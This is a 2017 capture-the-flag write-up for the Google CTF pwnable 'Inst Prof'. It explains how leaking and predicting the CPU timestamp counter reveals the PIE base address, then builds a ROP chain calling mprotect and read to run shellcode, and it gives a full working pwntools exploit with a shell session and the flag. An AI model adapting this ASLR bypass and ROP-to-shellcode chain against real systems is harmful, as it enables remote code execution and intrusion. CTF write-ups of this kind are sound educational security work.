Sunday, July 2, 2017

Google CTF – Pwnables - Inst Prof

Summary of Exploitation:

Leak CPU Time Stamp Counter (TSC)
Predict TSC values
Leak ELF base address using predicted TSC values
Return into read_n function
ROP payload of mprotect + read to execute shellcode

Analysis:

The provided binary is a 64-bit ELF with PIE and NX enabled with below functions:

• Main function sets up alarm for 30 seconds and invokes do_test function in infinite loop
• Allocate a memory page using mmap with PROT_READ | PROT_WRITE permission
• Copy a template code which executes 4 NOPs in a loop 0x1000 times
• Replace NOP with 4 bytes of user supplied code
• Make the page PROT_READ | PROT_EXEC using mprotect
• Measure the TSC before execution of shellcode
• Execute the shellcode
• Measure the TSC after execution of shellcode
• Output the difference in TSC
• Free the page using munmap and execute the loop again

Leaking CPU Time Stamp Counter (TSC):
.text:0000000000000B08      rdtsc              ; get Time Stamp Counter 
.text:0000000000000B0A      shl     rdx, 20h
.text:0000000000000B0E      mov     r12, rax
.text:0000000000000B11      xor     eax, eax
.text:0000000000000B13      or      r12, rdx   ; load TSC values in RDX & RAX to R12
.text:0000000000000B16      call    rbx        ; execute the shellcode
.text:0000000000000B18      rdtsc              ; get Time Stamp Counter
.text:0000000000000B1A      mov     edi, 1         
.text:0000000000000B1F      shl     rdx, 20h
.text:0000000000000B23      lea     rsi, [rbp+buf] 
.text:0000000000000B27      or      rdx, rax
.text:0000000000000B2A      sub     rdx, r12   ; Find the difference in TSC
.text:0000000000000B2D      mov     [rbp+buf], rdx
.text:0000000000000B31      mov     edx, 8         
.text:0000000000000B36      call    _write     ; Output the result
The TSC value is stored in R12 before execution of shellcode, later used for measuring difference as
.text:0000000000000B2A                 sub      rdx, r12
If the 4-byte user supplied code does xor r12, r12, the program outputs the entire RDX value (i.e. TSC) and goes into the next loop

Idea to leak pointers:

Load register R12 with a pointer fetched from stack as mov r12, [rbp-offset]. Now the program outputs (TSC – pointer loaded into R12). The problem here is both TSC and pointer in R12 are unknown values. However, we know the TSC value leaked from previous execution of loop. Let’s try to predict the current TSC value based on previous value.

TSC is measured under following conditions:

• Initial executions of do_test will take more CPU cycles due to cache effect
• Executing the do_test function multiple times will reduce the CPU cycles between loops. This is cache warming
• Do not read/write data per loop. Send all the payload once and read the output after all their executions. There should be no blocking

Consider the below code snippet:
for _ in range(16):
    payload += asm("xor r12, r12; nop")

r.send(payload)
tsc_values = r.recv(8 * 16)

first_tsc = u64(tsc_values[0:8])
prev_tsc  = first_tsc

print("[+] TSC = 0x%x" % (first_tsc))

for i in range(1, 16):
    curr_tsc = u64(tsc_values[i*8:(i+1)*8])
    diff_tsc = curr_tsc - prev_tsc
    prev_tsc = curr_tsc
    print("[+] TSC = 0x%x, diff = 0x%x" % (curr_tsc, diff_tsc))
$ python tsc_leak.py 
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[+] TSC = 0x244baebdaa75f
[+] TSC = 0x244baebdc57b4, diff = 0x1b055
[+] TSC = 0x244baebdcb015, diff = 0x5861
[+] TSC = 0x244baebdcfdb8, diff = 0x4da3
[+] TSC = 0x244baebdd47d8, diff = 0x4a20
[+] TSC = 0x244baebdd9272, diff = 0x4a9a
[+] TSC = 0x244baebdddd3b, diff = 0x4ac9
[+] TSC = 0x244baebde2850, diff = 0x4b15
[+] TSC = 0x244baebde7353, diff = 0x4b03
[+] TSC = 0x244baebdebf1b, diff = 0x4bc8
[+] TSC = 0x244baebdf0a4d, diff = 0x4b32
[+] TSC = 0x244baebdf56d3, diff = 0x4c86
[+] TSC = 0x244baebdfa1ec, diff = 0x4b19
[+] TSC = 0x244baebdfecdc, diff = 0x4af0
[+] TSC = 0x244baebe037b3, diff = 0x4ad7
[+] TSC = 0x244baebe08c23, diff = 0x5470
After the first few executions with higher CPU cycles, the values have come down and more regular i.e. predictable with good accuracy, except for some of the LSB bits

Leaking ELF base address:

To leak the ELF base address, load R12 register with value from rbp-0x28. This holds the pointer to
 
.text:0000000000000B18                 rdtsc
Now the program outputs (predicted TSC value – pointer loaded into R12), from which the pointer in R12 register can be computed. The last few bits might be inaccurate. However, the last 12 bits of the pointer are known as they are not randomized due to page alignment.

Can the LSB bits also can be leaked reliably using the technique? Yes, read the pointers in two chunks. i.e. instead of reading from rbp-0x28 as below:
gdb-peda$ x/gx $rbp-0x28
0x7fffffffde48: 0x0000555555554b18
Read the pointers into halves twice. Out of 8-byte address, 2 MSB bytes are 0x00
gdb-peda$ x/gx $rbp-0x2a
0x7fffffffde46: 0x555555554b180000
gdb-peda$ x/gx $rbp-0x2d
0x7fffffffde43: 0x554b180000000000
Since MSB bytes of TSC can be reliable found unlike the LSB bytes, this results in a reliable info leak. Below is the code:
for _ in range(16):
    payload += asm("xor r12, r12; nop")

# try finding difference in execution time between do_loop to predict rdtsc output

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2d]")  # leak 3 lsb bytes, unaligned read

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2a]")  # leak 3 msb bytes, unaligned read

print("[+] warming up cache for leaking pointers")
r.send(payload)
r.recv(16 * 8)

# leaking pointers in two chunks to make up for less predictable LSB values of TSC

t1 = u64(r.recv(8))       # leak lsb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))
print("[+] leaked TSC value = 0x%x") % (t1)

pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_lsb = 0x%x" % (pointer_lsb))

t1 = u64(r.recv(8))       # leak msb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))

pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_msb = 0x%x" % (pointer_msb))

# .text:0000000000000B18    rdtsc
pointer = (pointer_msb << 24) | pointer_lsb
print("[+] leaked address = 0x%x" % (pointer))

elf_base = pointer & 0xfffffffffffff000
print("[+] ELF base address = 0x%x" % (elf_base))
Gaining RIP control using relative write w.r.t RBP:

Once the ELF base address is leaked, a small ROP payload is setup in stack to invoke the read_n function using a series of mov operations:
# payload to return into read_n function

payload  = asm("mov r13, rsp; ret")
payload += asm("mov r14, [r13]")       # .text:0000000000000B18 rdtsc
payload += asm("mov r14b, 0xc3; ret")  # modify LSB to get pop rdi gadget
payload += asm("mov r15, [rbp-0x48]")  # .text:0000000000000AA3 mov[rbx-1],al
payload += asm("mov r15b, 0x80; ret")  # modify LSB to get read_n address
payload += asm("mov [rbp+24], r15")    # return into read_n
payload += asm("mov [rbp+16], r13")    # stack address as argument for read_n
payload += asm("mov [rbp+8], r14")     # overwrite RIP with pop rdi; read_n(stack_address, 0x1000)
r.send(payload)
RSI already holds the value 0x1000 due to the program state, hence the call becomes read_n(RSP, 0x1000). The function reads and executes a ROP payload to perform the below operations:
mprotect(elf_base, 0x1000, 7)
read(0, elf_base, 0x100)
jmp elf_base
$ python solver.py 
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[+] warming up cache for leaking pointers
[+] leaked TSC value = 0x30aba58d51eb8
[+] pointer_lsb = 0x173b18
[+] pointer_msb = 0x55636a
[+] leaked address = 0x55636a173b18
[+] ELF base address = 0x55636a173000
[+] sending ROP payload
[*] Switching to interactive mode
$ id
uid=1337(user) gid=1337(user) groups=1337(user)
$ cat flag.txt
CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}
Here is the full exploit:
from pwn import *

host = 'inst-prof.ctfcompetition.com'
port = 1337

context.arch = 'amd64'

if len(sys.argv) == 2: 
    r = process('./inst_prof')
else: 
    r = remote(host, port)
r.recvline()

# warmup the cache for the leaking pointers

payload = ''
for _ in range(16):
    payload += asm("xor r12, r12; nop")

# try finding difference in execution time between do_loop to predict rdtsc output

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2d]")  # leak 3 lsb bytes, unaligned read

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2a]")  # leak 3 msb bytes, unaligned read

print("[+] warming up cache for leaking pointers")
r.send(payload)
r.recv(16 * 8)

# leaking pointers in two chunks to make up for less predictable LSB values of TSC

t1 = u64(r.recv(8))       # leak lsb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))
print("[+] leaked TSC value = 0x%x") % (t1)

pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_lsb = 0x%x" % (pointer_lsb))

t1 = u64(r.recv(8))       # leak msb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))

pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_msb = 0x%x" % (pointer_msb))

# .text:0000000000000B18    rdtsc
pointer = (pointer_msb << 24) | pointer_lsb
print("[+] leaked address = 0x%x" % (pointer))

elf_base = pointer & 0xfffffffffffff000
print("[+] ELF base address = 0x%x" % (elf_base))

# payload to return into read_n function

payload  = asm("mov r13, rsp; ret")
payload += asm("mov r14, [r13]")       # .text:0000000000000B18 rdtsc
payload += asm("mov r14b, 0xc3; ret")  # pop rdi; ret
payload += asm("mov r15, [rbp-0x48]")  # .text:0000000000000AA3 mov     [rbx-1], al
payload += asm("mov r15b, 0x80; ret")  # read_n address
payload += asm("mov [rbp+24], r15")    # return into read_n
payload += asm("mov [rbp+16], r13")    # stack address
payload += asm("mov [rbp+8], r14")     # overwrite RIP with pop rdi; read_n(stack_address, 0x1000)
r.send(payload) 
r.recv(8 * 8)

# send ROP payload using leaked ELF base address
print("[+] sending ROP payload")

payload  = "A" * 72
payload += p64(elf_base + 0xbba)  # 0x00000bba: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 
payload += p64(0)
payload += p64(1)
payload += p64(elf_base + 0x0202028)  # GOT address of alarm as NOP for call   QWORD PTR [r12+rbx*8]
payload += p64(0x7)                   # rdx 
payload += p64(0x1000)                # rsi
payload += p64(0x4545454545454545)    # rdi
payload += p64(elf_base + 0xba0)      # __libc_csu_init
payload += "F"* 8

payload += p64(0)
payload += p64(1)
payload += p64(elf_base + 0x0202028)  # GOT address of alarm as NOP for call   QWORD PTR [r12+rbx*8]
payload += p64(0x100)                 # rdx, load registers for read
payload += p64(elf_base)              # rsi
payload += p64(0)                     # rdi

# make ELF header RWX
payload += p64(elf_base + 0xbc3)      # pop rdi; ret
payload += p64(elf_base)              # rdi
payload += p64(elf_base + 0x820)      # mprotect(elf_base, 0x1000, 7)

# read into ELF header
payload += p64(elf_base + 0xba0)      # __libc_csu_init
payload += "G" * 56
payload += p64(elf_base + 0x7e0)      # read(0, elf_base, 0x100)

# return to shellcode
payload += p64(elf_base)
payload += p64(0xdeadbeef00000000)

payload += "B" * (4096 - len(payload))
r.send(payload)

sc  = asm(shellcraft.amd64.linux.syscall('SYS_alarm', 0))
sc += asm(shellcraft.amd64.linux.sh())
r.sendline(sc)
r.interactive()